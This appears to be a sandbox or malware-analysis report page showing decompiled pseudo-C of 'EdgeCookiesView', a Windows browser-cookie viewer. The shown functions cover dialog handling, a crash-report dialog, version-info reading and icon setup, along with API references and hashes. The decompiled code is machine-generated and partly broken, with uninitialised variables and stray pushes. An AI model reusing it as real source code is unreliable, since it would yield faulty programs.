				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x412f50;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x412f50);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"EdgeCookiesView");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00405B17(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x412fd0;
								if( *0x412fd0 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x412fd0;
									if( *0x412fd0 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x412fd0;
										if( *0x412fd0 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x412fd0);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00405CD2();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x004010c7
0x004010ca
0x004010cb
0x004010cf
0x004010d7
0x004010d9
0x004012a4
0x004012ac
0x004012e7
0x004012ae
0x004012c7
0x004012d6
0x004012d6
0x004012f5
0x0040130d
0x0040131e
0x00401320
0x0040132a
0x00000000
0x004010df
0x004010df
0x004010e0
0x00401265
0x0040126a
0x0040126d
0x00401271
0x0040127d
0x0040127d
0x00401280
0x00000000
0x00401286
0x0040128d
0x00401299
0x00000000
0x00401299
0x00401273
0x00401273
0x00401277
0x00000000
0x00000000
0x00000000
0x00000000
0x00401277
0x004010e6
0x004010e6
0x004010e9
0x00401215
0x00401217
0x0040121a
0x00401242
0x0040124a
0x00000000
0x00401250
0x00401258
0x0040125a
0x0040125d
0x00000000
0x00401263
0x00000000
0x00401263
0x0040125d
0x0040121c
0x0040121c
0x00401221
0x0040122f
0x00401237
0x00401237
0x004010ef
0x004010ef
0x004010f4
0x00401185
0x0040118e
0x0040119c
0x0040119f
0x004011a2
0x004011a4
0x004011a7
0x004011b4
0x004011b6
0x004011b9
0x004011d8
0x004011e0
0x00000000
0x004011e6
0x004011ee
0x004011f0
0x004011fb
0x004011fd
0x004011ff
0x00000000
0x00401205
0x00000000
0x00401205
0x004011ff
0x004011bb
0x004011bb
0x004011cd
0x00000000
0x004011cd
0x004010fa
0x004010fc
0x00401331
0x00401331
0x00401331
0x00401102
0x00401102
0x0040110b
0x00401119
0x0040111c
0x0040111f
0x00401121
0x00401124
0x00401136
0x00401151
0x00401159
0x00000000
0x0040115f
0x00401167
0x00401169
0x00401174
0x00401176
0x00401178
0x00000000
0x0040117e
0x0040117e
0x00000000
0x0040117e
0x00401178
0x00401138
0x0040113e
0x0040113f
0x0040113f
0x00401142
0x00401149
0x0040114b
0x0040114b
0x00401136
0x004010fc
0x004010f4
0x004010e9
0x004010e0
0x00401337

APIs

GetDlgItem.USER32 ref: 0040111F
ChildWindowFromPoint.USER32 ref: 00401131
GetDlgItem.USER32 ref: 00401167
ChildWindowFromPoint.USER32 ref: 00401174
GetDlgItem.USER32 ref: 004011A2
ChildWindowFromPoint.USER32 ref: 004011B4
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 004011BD
LoadCursorW.USER32(00000000,00000067), ref: 004011C6
SetCursor.USER32(00000000,?,?), ref: 004011CD
GetDlgItem.USER32 ref: 004011EE
ChildWindowFromPoint.USER32 ref: 004011FB
GetDlgItem.USER32 ref: 00401215
SetBkMode.GDI32(?,00000001), ref: 00401221
SetTextColor.GDI32(?,00C00000), ref: 0040122F
GetSysColorBrush.USER32(0000000F), ref: 00401237
GetDlgItem.USER32 ref: 00401258
EndDialog.USER32(?,?), ref: 0040128D
DeleteObject.GDI32(?), ref: 00401299
GetDlgItem.USER32 ref: 004012BE
ShowWindow.USER32(00000000), ref: 004012C7
GetDlgItem.USER32 ref: 004012D3
ShowWindow.USER32(00000000), ref: 004012D6
SetDlgItemTextW.USER32 ref: 004012E7
SetWindowTextW.USER32(?,EdgeCookiesView), ref: 004012F5
SetDlgItemTextW.USER32 ref: 0040130D
SetDlgItemTextW.USER32 ref: 0040131E

Strings

EdgeCookiesView, xrefs: 004012ED

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: EdgeCookiesView
API String ID: 829165378-2656830938
Opcode ID: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
Instruction ID: d9b36552e8d9c1158f8869abb926452dfc915059135fe28c0a7548d8f12e7aa6
Opcode Fuzzy Hash: c334951574b09e503c6ba9ad871ca57f87af409fc7462e6d36551130802c1d45
Instruction Fuzzy Hash: 87515A31500308EBEB31AF60DD44AAE7BB5FB44301F104A3AF951B69F0C778AD59AB08

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C7, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040C0C7(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040E340(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00405B17(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x41245c,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00405D33( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x412450,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00405D33( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E0040591F();
					__eflags = _t64;
					if(_t64 == 0) {
						E0040C9D6();
					} else {
						E0040CA5A();
					}
					__eflags =  *0x41325c; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x412674; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x4128ec = 0;
						E0040CBD8(_t105, __eflags);
						__eflags =  *0x4128ec; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x4128f0, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x4128ec; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00405888( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x413260; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x412450);
							_push( *0x41245c);
							_push( *0x41244c);
							_push( *0x412434);
							_push( *0x412438);
							_push( *0x412440);
							_push( *0x412444);
							_push( *0x41243c);
							_push( *0x412448);
							_push( &_v1580);
							_push( *0x412674);
							_push( *0x412668);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040DFD6();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

0x0040c0cf
0x0040c0d7
0x0040c0df
0x0040c162
0x0040c176
0x0040c17d
0x0040c184
0x0040c19d
0x0040c19f
0x0040c1b2
0x0040c1b8
0x0040c1c6
0x0040c1cc
0x0040c1df
0x0040c1e6
0x0040c1f7
0x0040c1fe
0x0040c203
0x0040c206
0x0040c218
0x0040c225
0x0040c229
0x0040c22b
0x0040c22d
0x0040c23e
0x0040c244
0x0040c244
0x0040c25b
0x0040c25d
0x0040c25f
0x0040c26f
0x0040c275
0x0040c275
0x0040c276
0x0040c27b
0x0040c27d
0x0040c286
0x0040c27f
0x0040c27f
0x0040c27f
0x0040c28b
0x0040c291
0x0040c29b
0x0040c2a8
0x0040c2ae
0x0040c2b3
0x0040c2b9
0x0040c2bc
0x0040c2c2
0x0040c2c3
0x0040c2c4
0x0040c2ca
0x0040c2cf
0x0040c2d7
0x0040c2ea
0x0040c2ef
0x0040c2f2
0x0040c2f8
0x0040c30d
0x0040c313
0x0040c2f8
0x00000000
0x0040c293
0x0040c293
0x0040c299
0x0040c314
0x0040c31a
0x0040c321
0x0040c322
0x0040c32e
0x0040c334
0x0040c33a
0x0040c340
0x0040c346
0x0040c34c
0x0040c352
0x0040c358
0x0040c35e
0x0040c35f
0x0040c36b
0x0040c371
0x0040c376
0x0040c37b
0x0040c37c
0x0040c394
0x0040c3a5
0x0040c3ab
0x0040c3b1
0x0040c3b1
0x00000000
0x0040c299
0x0040c291
0x0040c0e2
0x0040c0e8
0x0040c0f3
0x0040c116
0x0040c124
0x0040c13f
0x0040c142
0x0040c14e
0x0040c156
0x0040c156
0x0040c116
0x0040c0f3
0x00000000

APIs

EndDialog.USER32(?,?), ref: 0040C10C
GetDlgItem.USER32 ref: 0040C124
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040C142
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 0040C14E
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0040C156
memset.MSVCRT ref: 0040C17D
memset.MSVCRT ref: 0040C19F
memset.MSVCRT ref: 0040C1B8
memset.MSVCRT ref: 0040C1CC
memset.MSVCRT ref: 0040C1E6
memset.MSVCRT ref: 0040C1FE
GetCurrentProcess.KERNEL32 ref: 0040C206
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040C229
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040C25B
memset.MSVCRT ref: 0040C2AE
GetCurrentProcessId.KERNEL32 ref: 0040C2BC
memcpy.MSVCRT ref: 0040C2EA
wcscpy.MSVCRT ref: 0040C30D
_snwprintf.MSVCRT ref: 0040C37C
SetDlgItemTextW.USER32 ref: 0040C394
GetDlgItem.USER32 ref: 0040C39E
SetFocus.USER32(00000000), ref: 0040C3A5

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 0040C371
{Unknown}, xrefs: 0040C191

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
Instruction ID: 3431b055b2365f4bc913e86f7a298cdc42a4156783f6a5b9feadd91d66c4c499
Opcode Fuzzy Hash: 888bafc67b277ea66c09e682880ee55d231aecf6e6b028a468f373f7cbb56ac5
Instruction Fuzzy Hash: B271A3B2800119EEDB20AF51DD85EDA377CEB08354F0085BAF908F6191DA799E949F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE36, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040DE36(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E0040674D(__edi);
					_push(_v8);
					L0040E038();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x6cdfe853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900006c
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0xfee850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0x38680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040fa
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040DFD6();
						if(E0040DDA7( &_v572, _t84,  &_v60, 0x40f454) == 0) {
							goto L5;
						}
					}
					E0040DDA7(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040DDA7(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040DDA7(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040DDA7(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040DDA7(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040DDA7(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040DDA7(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040DDA7(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040E032();
				}
				return _t97;
			}

0x0040de36
0x0040de47
0x0040de49
0x0040de4c
0x0040de53
0x0040de56
0x0040de5f
0x0040de64
0x0040de67
0x0040de6d
0x0040de77
0x0040de91
0x0040de93
0x0040de96
0x0040de99
0x0040de9c
0x0040de9f
0x0040dea1
0x0040dea4
0x0040dea7
0x0040deaa
0x0040dead
0x0040deb0
0x0040deb3
0x0040deb6
0x0040deb6
0x0040dece
0x0040df08
0x0040df11
0x0040ded0
0x0040ded0
0x0040deda
0x0040dedb
0x0040dedc
0x0040dee4
0x0040dee6
0x0040dee7
0x0040df06
0x00000000
0x00000000
0x0040df06
0x0040df25
0x0040df3a
0x0040df4f
0x0040df64
0x0040df79
0x0040df8e
0x0040dfa3
0x0040dfb8
0x0040dfbf
0x0040dfc0
0x0040dfc1
0x0040dfc7
0x0040dfcc

APIs

GetFileVersionInfoSizeW.VERSION(0040730B,?,00000000), ref: 0040DE4C
??2@YAPAXI@Z.MSVCRT ref: 0040DE67
GetFileVersionInfoW.VERSION(0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE77
VerQueryValueW.VERSION(00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DE8A
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040F964,0040730B,?,0040730B,00000000,?,00000000,00000000,0040730B,?,00000000), ref: 0040DEC7
_snwprintf.MSVCRT ref: 0040DEE7
wcscpy.MSVCRT ref: 0040DF11
??3@YAXPAX@Z.MSVCRT ref: 0040DFC1

Strings

040904E4, xrefs: 0040DF0B
%4.4X%4.4X, xrefs: 0040DEDC
ProductName, xrefs: 0040DF18
ProductVersion, xrefs: 0040DF54
FileVersion, xrefs: 0040DF3F
\VarFileInfo\Translation, xrefs: 0040DEC1
LegalCopyright, xrefs: 0040DF93
FileDescription, xrefs: 0040DF2A
OriginalFileName, xrefs: 0040DFA8
InternalName, xrefs: 0040DF7E
CompanyName, xrefs: 0040DF69

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 1223191525-1542517562
Opcode ID: e3c1c2c435bed2f941286cbfa00b0d5ce1b97d62a5a92108709d5ab5f08d6fec
Instruction ID: 259d72124e724de92b6e9870ccb5e43e5a0f9d392629a35824c20b6fa1ecb0e7
Opcode Fuzzy Hash: e3c1c2c435bed2f941286cbfa00b0d5ce1b97d62a5a92108709d5ab5f08d6fec
Instruction Fuzzy Hash: FB4135B2900219BEC704EBE5DC41DDEB7BCAF48304F504567B505B3181DB78AA99CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 004099C4, Relevance: 33.1, APIs: 22, Instructions: 137
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004099C4(void* __eax) {
				struct _SHFILEINFOW _v692;
				void _v1214;
				short _v1216;
				void* _v1244;
				void* _v1248;
				void* _v1252;
				void* _v1256;
				void* _v1268;
				void* _t37;
				long _t38;
				long _t46;
				long _t48;
				long _t58;
				void* _t62;
				intOrPtr* _t64;

				_t64 = ImageList_Create;
				_t62 = __eax;
				if( *((intOrPtr*)(__eax + 0x2c0)) != 0) {
					if( *((intOrPtr*)(__eax + 0x2c8)) == 0) {
						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
						 *(_t62 + 0x2b4) = _t48;
						__imp__ImageList_SetImageCount(_t48, 1);
						_push( *(_t62 + 0x2b4));
					} else {
						_v692.hIcon = 0;
						memset( &(_v692.iIcon), 0, 0x2b0);
						_v1216 = 0;
						memset( &_v1214, 0, 0x208);
						GetWindowsDirectoryW( &_v1216, 0x104);
						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
						 *(_t62 + 0x2b4) = _t58;
						_push(_t58);
					}
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 1, ??);
				}
				if( *((intOrPtr*)(_t62 + 0x2c4)) != 0) {
					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
					 *(_t62 + 0x2b8) = _t46;
					__imp__ImageList_SetImageCount(_t46, 1);
					SendMessageW( *(_t62 + 0x2ac), 0x1003, 0,  *(_t62 + 0x2b8));
				}
				 *(_t62 + 0x2b0) =  *_t64(0x10, 0x10, 0x19, 1, 1);
				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
				_v1244 = _t37;
				__imp__ImageList_SetImageCount( *(_t62 + 0x2b0), 0);
				_t38 = GetSysColor(0xf);
				_v1248 = _t38;
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1256, _t38);
				ImageList_AddMasked( *(_t62 + 0x2b0), _v1252, _v1248);
				DeleteObject(_v1268);
				DeleteObject(_v1268);
				return SendMessageW(E00402986( *(_t62 + 0x2ac)), 0x1208, 0,  *(_t62 + 0x2b0));
			}

0x004099cc
0x004099d3
0x004099e4
0x004099f0
0x00409a65
0x00409a6a
0x00409a70
0x00409a76
0x004099f2
0x00409a00
0x00409a07
0x00409a17
0x00409a1c
0x00409a2e
0x00409a4c
0x00409a52
0x00409a58
0x00409a58
0x00409a89
0x00409a89
0x00409a91
0x00409a9d
0x00409aa2
0x00409aa8
0x00409ac0
0x00409ac0
0x00409ad5
0x00409af4
0x00409b0a
0x00409b17
0x00409b1b
0x00409b23
0x00409b34
0x00409b3e
0x00409b4e
0x00409b5a
0x00409b60
0x00409b89

APIs

memset.MSVCRT ref: 00409A07
memset.MSVCRT ref: 00409A1C
GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A2E
SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00409A4C
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409A65
ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409A70
SendMessageW.USER32(?,00001003,00000001,?), ref: 00409A89
ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409A9D
ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409AA8
SendMessageW.USER32(?,00001003,00000000,?), ref: 00409AC0
ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409ACC
GetModuleHandleW.KERNEL32(00000000), ref: 00409ADB
LoadImageW.USER32 ref: 00409AED
GetModuleHandleW.KERNEL32(00000000), ref: 00409AF8
LoadImageW.USER32 ref: 00409B0A
ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409B1B
GetSysColor.USER32(0000000F), ref: 00409B23
ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00409B3E
ImageList_AddMasked.COMCTL32(?,?,?), ref: 00409B4E
DeleteObject.GDI32(?), ref: 00409B5A
DeleteObject.GDI32(?), ref: 00409B60
SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00409B7D

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 304928396-0
Opcode ID: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
Instruction ID: 6a740ff22d918b1f3da30253e66a4340b4722f468affa3cdbe00c11f6054e755
Opcode Fuzzy Hash: 2f1983dae7ec13d187fd57d818e47cd18f1c9fda61e211336c08be529efc92e2
Instruction Fuzzy Hash: 4C419271641304BFE730AFA0DD8AF9B77A8FB48700F000839F795A51D2C7B6A8449B29

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC79, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040DC79(void* __esi, wchar_t* _a4, wchar_t* _a8) {
				int _v8;
				void _v518;
				long _v520;
				void _v1030;
				char _v1032;
				intOrPtr _t32;
				wchar_t* _t57;
				void* _t58;
				void* _t59;
				void* _t60;

				_t58 = __esi;
				_v520 = 0;
				memset( &_v518, 0, 0x1fc);
				_v1032 = 0;
				memset( &_v1030, 0, 0x1fc);
				_t60 = _t59 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
					_v8 = 0;
				}
				_t57 = _a4;
				 *_t57 = 0;
				if(_v8 != 0) {
					wcscpy(_t57, L"<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						_push(_t32);
						_push(L" size=\"%d\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
						_t60 = _t60 + 0x18;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						_push(E0040DBA9(_t33,  &_v1032));
						_push(L" color=\"#%s\"");
						_push(0xff);
						_push( &_v520);
						L0040DFD6();
						wcscat(_t57,  &_v520);
					}
					wcscat(_t57, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"<b>");
				}
				wcscat(_t57, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					wcscat(_t57, L"</b>");
				}
				if(_v8 != 0) {
					wcscat(_t57, L"</font>");
				}
				return _t57;
			}

0x0040dc79
0x0040dc94
0x0040dc9b
0x0040dca9
0x0040dcb0
0x0040dcb5
0x0040dcbc
0x0040dcc3
0x0040dcca
0x0040dcca
0x0040dcd0
0x0040dcd3
0x0040dcd6
0x0040dce2
0x0040dce7
0x0040dcee
0x0040dcf0
0x0040dcf1
0x0040dcfc
